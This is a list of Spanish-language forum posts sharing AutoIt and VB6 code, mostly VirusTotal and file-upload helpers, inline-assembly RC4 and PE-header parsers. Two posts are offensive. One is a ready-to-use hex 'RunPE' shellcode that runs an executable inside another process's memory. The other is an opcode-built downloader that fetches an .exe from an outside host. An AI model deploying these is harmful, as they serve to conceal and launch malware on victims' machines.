elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: ¿Eres nuevo? ¿Tienes dudas acerca del funcionamiento de la comunidad? Lee las Reglas Generales


  Mostrar Temas
Páginas: [1] 2
1  Programación / Programación Visual Basic / Efecto Agua en Imagen en: 19 Septiembre 2013, 21:24 pm
Bueno hace días vi un efecto muy bueno en el foro de Autoit. hoy me dio por portarlo a vb6.



Código Fuente.

http://www.sendspace.com/file/qo1gmx
2  Programación / Scripting / [AutoIt] VirusTotal API 2.0 UDF en: 4 Junio 2013, 13:40 pm
Bueno aquí una una UDF que tenias hace unos días lita pero ayer me decidí a actualizarla.  ;D


Requiere  winhttp

http://www.autoitscript.com/forum/topic/84133-winhttp-functions/?hl=winhttp


Ejemplo:

Código
  1. #include <Crypt.au3>
  2. #include "VT.au3"
  3.  
  4. Example()
  5.  
  6. Func Example()
  7.  
  8.    _Crypt_Startup()
  9.    Local $sFilePath = @WindowsDir & "\Explorer.exe"
  10.  
  11.    Local $bHash = _Crypt_HashFile($sFilePath, $CALG_MD5)
  12.   _Crypt_Shutdown()
  13.    Local $hVirusTotal = VT_Open()
  14.    Local $APIkey='Your API key'
  15.    ConsoleWrite(VT($hVirusTotal, $fReport, '20c83c1c5d1289f177bc222d248dab261a62529b19352d7c0f965039168c0654',$APIkey) & @CRLF)
  16.    ConsoleWrite(VT($hVirusTotal, $fScan, $sFilePath,$APIkey) & @CRLF)
  17.    ConsoleWrite(VT($hVirusTotal, $fRescan, hex($bHash),$APIkey) & @CRLF)
  18.    ConsoleWrite(VT($hVirusTotal, $uReport, "http://www.virustotal.com",$APIkey) & @CRLF)
  19.    ConsoleWrite(VT($hVirusTotal, $uScan, "http://www.google.com",$APIkey) & @CRLF)
  20.    ConsoleWrite(VT($hVirusTotal, $Comment, hex($bHash) ,$APIkey,"Hello Word | Hola Mundo") & @CRLF)
  21.    VT_Close($hVirusTotal) ;
  22. EndFunc   ;==>Example
  23.  


VT.au3 UDF

Código
  1. #include-once
  2. #include "WinHttp.au3"
  3.  
  4. ; #INDEX# =================================================================================================
  5. ; Title .........: VT.au3
  6. ; AutoIt Version : 3.3.8.1
  7. ; Language ......: English
  8. ; Description ...: VirusTotal public API version 2.0 implementation in Autoit
  9. ;thanks to: trancexx|ProgAndy "WinHttp.au3"  ||| guinness "Suggestions+Snippets ||| www.virustotal.com
  10. ;Reference https://www.virustotal.com/es/documentation/public-api
  11. ;Written by Danyfirex
  12. ;Date 12/05/2013 | Update 03/06/2013
  13. ; #FUNCTION# =============================================================================================
  14.  
  15.  
  16.  
  17.  
  18. ;===================CONSTANTS/CONSTANTES=======================
  19. Global Const $__sVirusTotal_Page = 'www.virustotal.com'
  20. Global Enum $eAPI_HttpOpen, $eAPI_HttpConnect
  21. Global Enum $fReport,$fScan,$fRescan,$uReport,$uScan,$Comment
  22. Global Const $tURL[6]=['/vtapi/v2/file/report','/vtapi/v2/file/scan','/vtapi/v2/file/rescan', _
  23.                       '/vtapi/v2/url/report','/vtapi/v2/url/scan','/vtapi/v2/comments/put']
  24. ;==============================================================
  25.  
  26.  
  27. ; #FUNCTIONS/FUNCIONES# =======================================
  28. ;VT() ;Use respective flag($Type)
  29. ;VT(ByRef $aAPI, $Type, $sResource, $sAPIkey,$Comments="")
  30. ;flags($Type)
  31. ;$fReport = retrieve a scan report on a given file
  32. ;$fScan   = submit a file for Scanning
  33. ;$fRescan = Rescan files in VirusTotal's file store
  34. ;$uReport = retrieve a scan report on a given URL
  35. ;$uScan   = submit a URL for Scanning
  36. ;$Comment = Make a commnet on files and URLs
  37. ; ==============================================================
  38.  
  39.  
  40.  
  41. ; #FUNCTION# =============================================================================================
  42. ; Name...........: VT_Open
  43. ; Description ...: Initialize and get session handle & connection handle
  44. ; Syntax.........: VT_Open()
  45. ; guinness
  46. ; #FUNCTION# =============================================================================================
  47. Func VT_Open()
  48.    Local $aAPI[2] = [0, 0]
  49.    $aAPI[$eAPI_HttpOpen] = _WinHttpOpen()
  50.    If @error Then $aAPI[$eAPI_HttpOpen] = -1
  51.    $aAPI[$eAPI_HttpConnect] = _WinHttpConnect($aAPI[$eAPI_HttpOpen], $__sVirusTotal_Page)
  52.    If @error Then $aAPI[$eAPI_HttpConnect] = -1
  53.    Return $aAPI
  54. EndFunc   ;==>VT_Open
  55.  
  56.  
  57. ; #FUNCTION# =============================================================================================
  58. ; Name...........: VT_Close
  59. ; Description ...: Close handles
  60. ; Syntax.........: VT_Close($handle)
  61. ;guinness
  62. ; #FUNCTION# =============================================================================================
  63. Func VT_Close(ByRef Const $aAPI)
  64.    _WinHttpCloseHandle($aAPI[$eAPI_HttpOpen])
  65.    _WinHttpCloseHandle($aAPI[$eAPI_HttpConnect])
  66.    Return True
  67. EndFunc   ;==>VT_Close
  68.  
  69.  
  70.  
  71. ; #FUNCTION# =============================================================================================
  72. ; Name...........: VT
  73. ; Syntax.........: VT(ByRef $aAPI, $Type, $sResource, $sAPIkey,$Comments="")
  74. ;VT($hVirusTotal, $fReport, '20c83c1c5d1289f177bc222d248dab261a62529b19352d7c0f965039168c0654',$APIkey)
  75. ;VT($hVirusTotal, $fScan, "C:\file.exe",$APIkey)
  76. ;VT($hVirusTotal, $fRescan, hex($bHash),$APIkey)
  77. ;VT($hVirusTotal, $uReport, "http://www.virustotal.com",$APIkey)
  78. ;VT($hVirusTotal, $uScan, "http://www.google.com",$APIkey)
  79. ;VT($hVirusTotal, $Comment, hex($bHash) ,$APIkey,"Hello Word | Hola Mundo")
  80. ; Parameters....: $Resource - md5/sha1/sha256/scan_id | filename | Url | respectively for flag($Type)
  81. ;                 $APIkey -  your API key.
  82. ;                 $Comments - your Comments
  83. ;Return.........; response format is a JSON object
  84. ; #FUNCTION# =============================================================================================
  85. Func VT(ByRef $aAPI, $Type, $sResource, $sAPIkey,$Comments="")
  86.  
  87.    If $aAPI[$eAPI_HttpConnect] = -1 Then $aAPI = VT_Open()
  88.  
  89. Select ;$fReport,$fScan,$fRescan,$uReport,$uScan,$Comment
  90.    Case $Type = $fReport
  91.         Return _WinHttpSimpleRequest($aAPI[$eAPI_HttpConnect], 'POST', $tURL[$Type], Default, 'resource=' & $sResource & '&key=' & $sAPIkey)
  92.  
  93. Case $Type = $fScan
  94.  Local $sBoundary="--------Boundary"
  95.  Local $sHeaders = "Content-Type: multipart/form-data; boundary=" & $sBoundary & @CRLF
  96.  Local $sData = ''
  97.    $sData &= "--" & $sBoundary & @CRLF
  98. $sData &= 'Content-Disposition: form-data; name="apikey"' & @CRLF & @CRLF & $sAPIkey & @CRLF
  99. $sData &= "--" & $sBoundary & @CRLF
  100. $sData &= __WinHttpFileContent("", "file", $sResource,$sBoundary)
  101. $sData &= "--" & $sBoundary & "--" & @CRLF
  102. Return _WinHttpSimpleRequest($aAPI[$eAPI_HttpConnect], "POST", $tURL[$Type], Default, StringToBinary($sData,0), $sHeaders)
  103.  
  104. Case $Type = $fRescan
  105.         Return _WinHttpSimpleRequest($aAPI[$eAPI_HttpConnect], "POST", "/vtapi/v2/file/rescan", Default, "resource=" & $sResource &"&key=" & $sAPIkey)
  106.  
  107. Case $Type = $uReport
  108.         Return _WinHttpSimpleRequest($aAPI[$eAPI_HttpConnect], 'POST', $tURL[$Type], Default, 'resource=' & $sResource & '&key=' & $sAPIkey)
  109.  
  110. Case $Type = $uScan
  111.         Return _WinHttpSimpleRequest($aAPI[$eAPI_HttpConnect], 'POST', $tURL[$Type], Default, 'url=' & $sResource & '&key=' & $sAPIkey)
  112.  
  113. Case $Type = $Comment
  114.         return _WinHttpSimpleRequest($aAPI[$eAPI_HttpConnect], "POST", "/vtapi/v2/comments/put", Default, "resource=" & $sResource & _
  115. "&comment=" & $Comments & "&key=" & $sAPIkey)
  116.  
  117.    Case Else
  118.        SetError(3)
  119. EndSelect
  120.  
  121. EndFunc   ;==>VT
  122.  


Saludos
3  Programación / Programación Visual Basic / Función Enviar Archivo VirusTotal (Escanea) en: 15 Mayo 2013, 00:47 am
Hola una función mas.  ;D
Envía muestra recuérdenlo!!!  >:D



Código
  1. ' =================================================================
  2. ' =================================================================
  3. ' => Autor: Pink
  4. ' => Upload file to VirusTotal.com For Scanning
  5. ' => Gracias VirusTotal.com
  6. ' => Fecha : 14|05|2013
  7. ' => Uso: VT_Scan("c:\hola.exe","your_APIKey")
  8. ' => Retorno:
  9. '{"response_code": 1,
  10. ' "verbose_msg": "Scan request successfully queued, come back later for the report",
  11. ' "resource": "999f7d93aa3d4a1a94cccfb4ea96bc2e28fd48020a481aa2dc7e215f3ce27bc0",
  12. ' "scan_id": "999f7d93aa3d4a1a94cccfb4ea96bc2e28fd48020a481aa2dc7e215f3ce27bc0-1324376258",
  13. ' "permalink": "https://www.virustotal.com/file/999f7d93aa3d4a1a94cccfb4ea96bc2e28fd48020a481aa2dc7e215f3ce27bc0/analysis/1324376258/",
  14. ' "sha256": "999f7d93aa3d4a1a94cccfb4ea96bc2e28fd48020a481aa2dc7e215f3ce27bc0",
  15. ' "sha1": "2cc875bca8030d745adfd14388b8c001471c2474",
  16. ' "md5": "4a00e1a3a14e4fec6f2b353b4f20bb73"}
  17. ' =================================================================
  18. ' =================================================================
  19. Option Explicit
  20.  
  21. Function VT_Scan(filepath As String, APIkey As String) As String
  22. Dim boundary As String
  23. Dim Post As String
  24. Dim bytesfinal()  As Byte
  25. Dim bytes() As Byte
  26. Dim Url As String
  27. Dim Http As Object
  28. Dim filedata As String
  29.  
  30. Url = "https://www.virustotal.com/vtapi/v2/file/scan"
  31. boundary = "--------Boundary"
  32.  
  33.  
  34. Open filepath For Binary As #1
  35. ReDim bytes(LOF(1) - 1)
  36. Get #1, , bytes()
  37. Close #1
  38.  
  39. filedata = StrConv(bytes(), vbUnicode)
  40.  
  41. Post = "--" & boundary & vbCrLf & _
  42. "Content-Disposition: form-data; name=" & Chr(34) & "apikey" & Chr(34) & vbCrLf & vbCrLf & _
  43. APIkey & vbCrLf & _
  44. "--" & boundary & vbCrLf & _
  45. "Content-Disposition: form-data; name=" & Chr(34) & "file" & Chr(34) & "; filename=" & Chr(34) & filename(filepath) & Chr(34) & vbCrLf & _
  46. "Content-Type: application/octet-stream" & vbCrLf & vbCrLf & _
  47. filedata & vbCrLf & _
  48. "--" & boundary & "--" & vbCrLf
  49.  
  50. bytesfinal() = StrConv(Post, vbFromUnicode)
  51.  
  52. Set Http = CreateObject("winhttp.winhttprequest.5.1")
  53. Http.Open "POST", Url, False
  54. Http.SetRequestHeader "Content-Type", "multipart/form-data; " & "boundary=" & boundary
  55. Http.Send (bytesfinal())
  56. VT_Scan = Http.Responsetext
  57. Set Http = Nothing
  58. End Function
  59.  
  60.  
  61. Function filename(cadena As String) As String
  62. Dim cadenas() As String
  63. cadenas() = Split(cadena, "\")
  64. filename = cadenas(UBound(cadenas))
  65. End Function
  66.  

Saludos
4  Programación / Programación Visual Basic / AnonFilesUpload Función en: 14 Mayo 2013, 20:22 pm
Una funcion para subir archivos a Anonfiles  :rolleyes:

Código
  1. ' =================================================================
  2. ' =================================================================
  3. ' => Autor: Danyfirex
  4. ' => Upload file to AnonFiles.com
  5. ' => Gracias AnonFiles.com
  6. ' => Fecha : 14|05|2013
  7. ' => Uso: AnonFilesUpload("c:\hola.rar")
  8. ' => Retorno: Texto de Respuesta (hotlink)
  9. ' =================================================================
  10. ' =================================================================
  11.  
  12.  
  13. Option Explicit
  14.  
  15. Function AnonFilesUpload(filepath As String) As String
  16. Dim boundary As String
  17. Dim Post As String
  18. Dim bytesfinal()  As Byte
  19. Dim bytes() As Byte
  20. Dim url As String
  21. Dim Http As Object
  22. Dim filedata As String
  23.  
  24. url = "https://anonfiles.com/api/hotlink"
  25. boundary = "--------Boundary"
  26.  
  27.  
  28. Open filepath For Binary As #1
  29. ReDim bytes(LOF(1) - 1)
  30. Get #1, , bytes()
  31. Close #1
  32. filedata = StrConv(bytes(), vbUnicode)
  33.  
  34. Post = "--" & boundary & vbCrLf & _
  35. "Content-Disposition: form-data; name=" & Chr(34) & "file" & Chr(34) & "; filename=" & Chr(34) & filename(filepath) & Chr(34) & vbCrLf & _
  36. "Content-Type: application/octet-stream" & vbCrLf & vbCrLf & _
  37. filedata & vbCrLf & _
  38. "--" & boundary & "--" & vbCrLf
  39.  
  40. bytesfinal() = StrConv(Post, vbFromUnicode)
  41.  
  42. Set Http = CreateObject("winhttp.winhttprequest.5.1")
  43. Http.Open "POST", url, False
  44. Http.SetRequestHeader "Content-Type", "multipart/form-data; " & "boundary=" & boundary
  45. Http.Send (bytesfinal())
  46. AnonFilesUpload = Http.ResponseText
  47. Set Http = Nothing
  48. End Function
  49.  
  50. Function filename(cadena As String) As String
  51. Dim cadenas() As String
  52. cadenas() = Split(cadena, "\")
  53. filename = cadenas(UBound(cadenas))
  54. End Function
5  Programación / ASM / Tutorial mini-IDE para FASM con gedit (linux) en: 20 Abril 2013, 18:08 pm
Hola. Bueno les traigo este pequeño manual para Configurar gedit+FASM en linux (Ubuntu)

Requisitos
Gedit Instalado.
pagina Oficial
http://projects.gnome.org/gedit/

Primero nos descargamos de aqui los archivos Necesarios.

http://www.sendspace.com/file/mrb69d

Fasm-1.70.03.tz
asm-intel.lang
comandos
Pasos




Luego descomprimimos Fasm-1.70.03.tz  colocamos la carpeta "FASM" donde queramos.
Yo elegí "/home/pink/fasm/"




Bueno ahora vamos Con gedit

Copiamos nuestro archivo asm-intel.lang a:

usr/share/gtksourceview-3.0/lenguage-specs/asm-intel.lang

gtksourceview-3.0 Esto puede variar gtksourceview-2.0 depende de la version.

Para copiar requiere permisos root.

Yo lo hice de la siguiente manera.

Alt+F2

Luego copiamos

gksu nautilus

así navegamos como root y podemos copiar archivos a cualquier parte.



Listo. ahora a configurar nuestro IDE para FASM

1. Abrimos gedit

2. En el menu superir nos vamos a "Editar" y entramos en las Preferencias

http://i.imgur.com/OqinxSM.png

Quiense por esta aunque este en ingles ( mi ubuntu esta en ingles) :S.

Activamos

-Mostar numero de linea



los cambios en las pestañas editor & fuente/Color son A preferencia.

En la Pestaña Plugins  Seleccionamos External Tools.



Ahora el Depurador y los comando para Compilar y Ejecutar.

Para poner el Depurador (ctrl+F9). en el menu superior nos vamos a "Ver" y activamos en Bottom Panel (Panel Inferior)



Y nos Aparecera el Shell Output abajo.



Los Comandos.

En la barra de menus nos vamos a "Herramientas" > Manage External Tools (Manejo de Herramientas Externas)




Nos abre la ventana donde configuraremos

Yo modifique de una vez el de Build (el que quiera crea uno nuevo)

Pegamos el Código que esta en el archivo de texto "comandos.txt" Importante
Colocamos el acceso por tecla.
save:Current document (documento actual)
Ouput: display in Bottom panel (Mostrar en el panel inferior) Importante



Recuerden Modificar
dirfasm Respectivamente donde este el Ejecutable de fasm.


Listo ahora tenemos nuestro IDE Para FASM en linux.

Aqui les dejo algunas Capturas del resultado final







Cualquier duda Pregunten.

Saludos

Pink(Danyfirex)
6  Programación / Programación Visual Basic / [APORTE] RC4 ASM en linea en: 7 Abril 2013, 03:08 am
Bueno andaba probando unas cosas y me traduje este cifrado.

Código
  1. ' =================================================================
  2. ' =================================================================
  3. ' => Autor: Pink
  4. ' => RC4 ASM en linea
  5. ' => Gracias Ward(Version Autoit)
  6. ' => Fecha : 01|04|2013
  7. ' => Uso: misbytes()=RC4ASM(bytesacifrar(),"clave")
  8. ' =================================================================
  9. ' =================================================================
  10.  
  11.  
  12. Option Explicit
  13.  
  14. Private Declare Function CallWindowProcW Lib "USER32" (ByVal lpPrevWndFunc As Long, ByVal hWnd As Long, ByVal Msg As Long, ByVal wParam As Long, ByVal lParam As Long) As Long
  15.  
  16.  
  17. Public Function RC4ASM(datos() As Byte, pass As String) As Byte()
  18. Dim passbyte() As Byte
  19. Dim B_RC4() As Byte
  20. Dim Str_OP  As String
  21. Dim i As Long
  22.  
  23. Str_OP = "C81001006A006A005356578B551031C989C84989D7F2AE484829C88945F085C00F84DC000000B90001000088C82C0188840DEFFEFFFFE2F38365F4008365FC00817DFC000100007D478B45FC31D2F775F0920345100FB6008B4DFC0FB68C0DF0FEFFFF01C80345F425FF0000008945F48B75FC8A8435F0FEFFFF8B7DF486843DF0FEFFFF8"
  24. Str_OP = Str_OP & "88435F0FEFFFFFF45FCEBB08D9DF0FEFFFF31FF89FA39550C76638B85ECFEFFFF4025FF0000008985ECFEFFFF89D80385ECFEFFFF0FB6000385E8FEFFFF25FF0000008985E8FEFFFF89DE03B5ECFEFFFF8A0689DF03BDE8FEFFFF860788060FB60E0FB60701C181E1FF0000008A840DF0FEFFFF8B750801D6300642EB985F5E5BC9C21000"
  25. passbyte = StrConv(pass, vbFromUnicode)
  26.  
  27. ReDim B_RC4((Len(Str_OP) / 2) - 1)
  28. For i = 1 To Len(Str_OP) - 1 Step 2
  29. B_RC4(Int(i / 2)) = CByte("&h" & Mid(Str_OP, i, 2))
  30. Next
  31.  
  32. CallWindowProcW VarPtr(B_RC4(0)), VarPtr(datos(0)), UBound(datos) + 1, VarPtr(passbyte(0)), 0
  33.  
  34. RC4ASM = datos()
  35.  
  36. End Function

Saludos
7  Programación / Scripting / Download Funcion [autoit] en: 17 Diciembre 2012, 16:04 pm
Bueno aquí les dejo la versión en Autoit de la que hice en delphi.

Código:
#cs -------------------------------------------------------
AutoIt Version: 3.3.8.1
Traducido Por..........: Pink
Agradecimientos........: monoceres
Version Delphi por........:  Pink
Script Function...: Download
Uso..............:Download($urlfile,$pathtosave)
#ce -------------------------------------------------------

Download("http://whitehat.su/Anotador.exe","C:\file.exe")
Func Download($Url,$path)
local $bytes = DllStructCreate("byte[512]")
local $Address= DllCall("Kernel32.dll", "ptr", "GetProcAddress", "ptr",GetModuleHandle("urlmon.dll"), "str", "URLDownloadToFileW")
$Address= $Address[0]
Local $Bufferurl = DllStructCreate("wchar url[" & StringLen($Url) +1 & "]")
Local $Bufferpath = DllStructCreate("wchar path[" & StringLen($path) +1  & "]")
    DllStructSetData($Bufferurl, "url", $Url)
    DllStructSetData($Bufferpath, "path", $path)

Local $Opcode
$Opcode &= "0x"
$Opcode &= "33DB"
$Opcode &= "68" & SwapEndian(0)
$Opcode &= "68" & SwapEndian(0)
$Opcode &= "68" & SwapEndian(DllStructGetPtr($Bufferpath, 1))
$Opcode &= "68" & SwapEndian(DllStructGetPtr($Bufferurl, 1))
$Opcode &= "68" & SwapEndian(0)
$Opcode &= "B8" & SwapEndian($Address)
$Opcode &= "FFD0"
$Opcode &= "53"
$Opcode &= "58"
$Opcode &= "C3"
DllStructSetData($bytes, 1, $Opcode)
Local $Ret = DllCall("user32.dll", "int", "CallWindowProc", "ptr", DllStructGetPtr($bytes), "int", 0, "int", 0, "int", 0, "int", 0)
EndFunc

Func GetModuleHandle($sModuleName)
Local $sModuleNameType = "wstr"
If $sModuleName = "" Then
  $sModuleName = 0
  $sModuleNameType = "ptr"
EndIf
Local $aResult = DllCall("kernel32.dll", "handle", "GetModuleHandleW", $sModuleNameType, $sModuleName)
If @error Then Return SetError(@error, @extended, 0)
Return $aResult[0]
EndFunc ;==>GetModuleHandle WinAPI

Func SwapEndian($hex)
    Return Hex(Binary($hex))
EndFunc   ;==>SwapEndian


Saludos
8  Programación / Scripting / [Autoit] RunPE Shellcode en: 6 Diciembre 2012, 15:44 pm
Bueno les dejo el mshRunPE version Autoit que hice hace tiempo. Un simple ejemplo de como usar shellcode en Autoit.  ;D

Código
  1. #cs -------------------------------------------------------
  2. AutoIt Version: 3.3.8.1
  3. Traducido Por..........: Pink
  4. Agradecimientos: hamavb & iCodeInVB6
  5. Script Function...: RunPE-ShellCode "Correr Ejecutable En memoria"
  6. Uso..............: RunPE(Path,$archivobinario)
  7. #ce -------------------------------------------------------
  8.  
  9.  
  10. Func RunPE($path,$filebin)
  11.  
  12.  
  13. local  $ASM = "0x60E84E0000006B00650072006E0065006C003300320000006E00740064006C006C0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000005B8BFC6A42E8BB0300008B54242889118B54242C6A3EE8AA03000089116A4AE8A103000089396A1E6A3CE89D0300006A2268F4000000E8910300006A266A24E8880300006A2A6A40E87F030000"
  14.    $ASM &= "6A2E6A0CE8760300006A3268C8000000E86A0300006A2AE85C0300008B09C701440000006A12E84D030000685BE814CF51E8790300006A3EE83B0300008BD16A1EE8320300006A40FF32FF31FFD06A12E823030000685BE814CF51E84F0300006A1EE8110300008B098B513C6A3EE8050300008B3903FA6A22E8FA0200008B0968F80000005751FFD06A00E8E80200006888FEB31651E8140300006A2EE8D60200"
  15.    $ASM &= "008B396A2AE8CD0200008B116A42E8C402000057526A006A006A046A006A006A006A00FF31FFD06A12E8A902000068D03710F251E8D50200006A22E8970200008B116A2EE88E0200008B09FF7234FF31FFD06A00E87E020000689C951A6E51E8AA0200006A22E86C0200008B118B396A2EE8610200008B096A406800300000FF7250FF7734FF31FFD06A36E8470200008BD16A22E83E0200008B396A3EE8350200"
  16.    $ASM &= "008B316A22E82C0200008B016A2EE8230200008B0952FF775456FF7034FF316A00E81002000068A16A3DD851E83C02000083C40CFFD06A12E8F9010000685BE814CF51E8250200006A22E8E70100008B1183C2066A3AE8DB0100006A025251FFD06A36E8CE010000C70100000000B8280000006A36E8BC010000F7216A1EE8B30100008B118B523C81C2F800000003D06A3EE89F01000003116A26E8960100006A"
  17.    $ASM &= "2852FF316A12E88A010000685BE814CF51E8B601000083C40CFFD06A26E8730100008B398B098B71146A3EE86501000003316A26E85C0100008B098B510C6A22E8500100008B090351346A46E8440100008BC16A2EE83B0100008B0950FF77105652FF316A00E82A01000068A16A3DD851E85601000083C40CFFD06A36E8130100008B1183C20189116A3AE8050100008B093BCA0F8533FFFFFF6A32E8F4000000"
  18.    $ASM &= "8B09C701070001006A00E8E500000068D2C7A76851E8110100006A32E8D30000008B116A2EE8CA0000008B0952FF7104FFD06A22E8BB0000008B3983C7346A32E8AF0000008B318BB6A400000083C6086A2EE89D0000008B116A46E894000000516A045756FF326A00E88600000068A16A3DD851E8B200000083C40CFFD06A22E86F0000008B098B51280351346A32E8600000008B0981C1B000000089116A00E8"
  19.    $ASM &= "4F00000068D3C7A7E851E87B0000006A32E83D0000008BD16A2EE8340000008B09FF32FF7104FFD06A00E82400000068883F4A9E51E8500000006A2EE8120000008B09FF7104FFD06A4AE8040000008B2161C38BCB034C2404C36A00E8F2FFFFFF6854CAAF9151E81E0000006A406800100000FF7424186A00FFD0FF742414E8CFFFFFFF890183C410C3E82200000068A44E0EEC50E84B00000083C408FF742404"
  20.    $ASM &= "FFD0FF74240850E83800000083C408C355525153565733C0648B70308B760C8B761C8B6E088B7E208B3638471875F3803F6B7407803F4B7402EBE78BC55F5E5B595A5DC35552515356578B6C241C85ED74438B453C8B54287803D58B4A188B5A2003DDE330498B348B03F533FF33C0FCAC84C07407C1CF0D03F8EBF43B7C242075E18B5A2403DD668B0C4B8B5A1C03DD8B048B03C55F5E5B595A5DC3C300000000"
  21.  
  22.  
  23. Local $BufferASM = DllStructCreate("byte[" & BinaryLen($ASM) & "]")
  24. Local $binBuffer=DllStructCreate("byte[" & BinaryLen($filebin) & "]")
  25.  
  26.  
  27. DllStructSetData($BufferASM, 1, $ASM)
  28. DllStructSetData($binBuffer, 1, $filebin)
  29.  
  30.  
  31.  
  32.  
  33. Local $Ret = DllCall("user32.dll", "int", "CallWindowProcW", _
  34.            "ptr", DllStructGetPtr($BufferASM), _
  35.            "wstr", ($Path), _
  36.            "ptr", DllStructGetPtr($binBuffer), _
  37.            "int", 0, _
  38.            "int", 0)
  39.  
  40. EndFunc


saludos
9  Programación / Programación Visual Basic / ASM + Visual Basic Duda Imprimir Numero en: 10 Octubre 2012, 19:01 pm
Hola, bueno ando estudiado sobre todo esto de ASM inline.

y me gustaría saber como hago esta simple rutina d asm en vb.

Código
  1.  
  2.        B8                      mov eax, 00000080
  3.        C3                      ret
  4.  
  5.  

a lo que me refiero es a imprimir o mostrar en un msgbox un simple numero en este caso 128.

10  Programación / Scripting / [Autoit] Get_EOF Ejemplos en: 27 Agosto 2012, 15:19 pm
bueno aquí una pequeña contribución para los que les gusta Autoit  ;D

Les dejo dos ejemplos uno con estructura y el otro sin estructura.

Código
  1. #cs -------------------------------------------------------
  2. AutoIt Version: 3.3.8.1
  3. Author..........: Pink
  4. Script Function...: Get_EOF
  5. Uso..............: Get_EOF(Runta Archuivo)
  6. Retorna : "Posicion EOF"
  7. Gracias: EON-Karcrack-The Swash
  8. #ce -------------------------------------------------------
  9.  
  10.  
  11. ;Ejemplo
  12. $Path="C:\Users\Usuario\Desktop\Anotador.exe"
  13. msgbox(0,"",Get_EOF($Path))
  14.  
  15.  
  16. Func Get_EOF($MyFile)
  17. Local $File = FileOpen($MyFile,16)
  18. If @error Then
  19. Msgbox(0,"Error","No se Pudo leer el Archivo")
  20. Endif
  21.  
  22. Local $FileLen = FileGetSize($MyFile)
  23. Local $Binary = DllStructCreate("byte["& $FileLen &"]")
  24. DllStructSetData($Binary,1,FileRead($File))
  25. FileClose($File)
  26. Local $BinaryPtr = DllStructGetPtr($Binary)
  27.  
  28.  
  29.  
  30.  
  31. Local Const $I_N_H_Len = 248
  32. Local Const $I_F_H_Len = 20
  33. Local Const $I_O_H_Len = 224
  34. Local Const $I_S_H_Len = 40
  35.  
  36. Local $IMAGE_DOS_HEADER = DllStructCreate( _
  37. "WORD e_magic;WORD e_cblp;WORD e_cp;WORD e_crlc;WORD e_cparhdr;WORD e_minalloc;WORD e_maxalloc;"& _
  38. "WORD e_ss;WORD e_sp;WORD e_csum;WORD e_ip;WORD e_cs;WORD e_lfarlc;WORD e_ovno;"& _
  39. "WORD e_res[4];WORD e_oemid;WORD e_oeminfo;WORD e_res2[10];WORD e_lfanew",$BinaryPtr)
  40.  
  41.  
  42. If Not DllStructGetData($IMAGE_DOS_HEADER,"e_magic") = 23177 Then
  43. Msgbox(0,"Error","Firma MZ Si Encontrado " )
  44. EndIf
  45.  
  46.  
  47.  
  48. $BinaryPtr += DllStructGetData($IMAGE_DOS_HEADER,"e_lfanew")
  49.  
  50. Local $IMAGE_NT_HEADERS = DllStructCreate( _
  51. "DWORD signature;CHAR ifh["& $I_F_H_Len &"];CHAR ioh["& $I_O_H_Len &"]",$BinaryPtr)
  52.  
  53. If Not DllStructGetData($IMAGE_NT_HEADERS,"signature") = 17744 Then
  54. Msgbox(0,"Error","Firma PE No Encontrada")
  55. Endif
  56.  
  57. Local $IMAGE_FILE_HEADER = DllStructCreate( _
  58. "WORD machine;WORD numberofsections;DWORD timedatestamp;DWORD pointertosymboltable;DWORD numberofsymbols;"& _
  59. "WORD SizeOfOptionalHeader;WORD characteristics",DllStructGetPtr($IMAGE_NT_HEADERS,"ifh"))
  60.  
  61. local $IMAGE_OPT_HEADER = DllStructCreate( _
  62. "WORD magic;BYTE majorlinkerversion;BYTE minorlinkerversion;DWORD sizeofcode;DWORD sizeofinitializeddata;"& _
  63. "DWORD sizeofuninitializeddata;DWORD addressofentrypoint;DWORD baseofcode;DWORD baseofdata;DWORD imagebase;"& _
  64. "DWORD sectionalignment;DWORD filealignment;WORD majoroperatingsystemversion;WORD minoroperatingsystemversion;"& _
  65. "WORD majorimageversion;WORD minorimageversion;WORD majoresubsystemversion;WORD minorsubsystemversion;"& _
  66. "DWORD win32versionvalue;DWORD sizeofimage;DWORD sizeofheaders;DWORD checksum;WORD subsystem;WORD dllcharacteristics;"& _
  67. "DWORD sizeofstackreserve;DWORD sizeofstackcommit;DWORD sizeofheapcommit;DWORD loaderflags;DWORD numberofrvaandsizes;"& _
  68. "DOUBLE datadirectory[16]",DllStructGetPtr($IMAGE_NT_HEADERS,"ioh"))
  69.  
  70. $BinaryPtr += $I_N_H_Len
  71.  
  72. $InicioINT=DllStructGetData($IMAGE_DOS_HEADER,"e_lfanew")
  73. $NS=DllStructGetData($IMAGE_FILE_HEADER,'numberofsections')-1
  74. $UTLS=$NS*$I_S_H_Len
  75.  
  76. $BinaryPtr += $UTLS
  77.  
  78. Local $IMAGE_SECTION_HEADER = DllStructCreate( _
  79. "CHAR name[8];DWORD virtualsize;DWORD virtualaddress;DWORD sizeofrawdata;DWORD pointertorawdata;DWORD pointertorelocations;"& _
  80. "DWORD pointertolinenumbers;WORD numberofrelocations;WORD numberoflinenumbers;DWORD characteristics",$BinaryPtr)
  81.  
  82.  
  83.  
  84.  
  85. $RawSize=dec(Hex(DllStructGetData($IMAGE_SECTION_HEADER, "SizeOfRawData")))
  86. $RawOffset=dec(Hex(DllStructGetData($IMAGE_SECTION_HEADER, "PointerToRawData")))
  87.  
  88.  
  89. Return $RawSize+$RawOffset
  90.  
  91. EndFunc  






Código
  1. #cs -------------------------------------------------------
  2. AutoIt Version: 3.3.8.1
  3. Author..........: Pink
  4. Script Function...: Get_EOF
  5. Uso..............: Get_EOF(Runta Archuivo)
  6. Retorna : "Posicion EOF"
  7. Gracias: EON-Karcrack-The Swash
  8. #ce ------------------------------------
  9.  
  10.  
  11.  
  12.  
  13. ;Ejemplo
  14.  
  15.  
  16. local $myfile="C:\Users\Usuario\Desktop\Anotador.exe"
  17.  
  18. msgbox(0,"",Get_EOF($myfile))
  19.  
  20. Func Get_EOF($file)
  21.    Const $l_fanew=60
  22.    Const $PEsize=4
  23.    Const $I_F_H=20
  24.    const $SizeS =40
  25.    local $LFvalue ;offset Entrada IMAGE_NT_HEADERS firma PE
  26.    local $Size_O_H ;izeOfOptionalHeader
  27.    local $NofS  ;NumberOfSections
  28.    local $fin_I_S_H ;IMAGE_SECTION_HEADER
  29.  
  30.  
  31. ;leyendo archivo y cargando buffer
  32.    $hfile=fileopen($file)
  33.    $binary=fileread($hfile,1000)
  34.  
  35.  
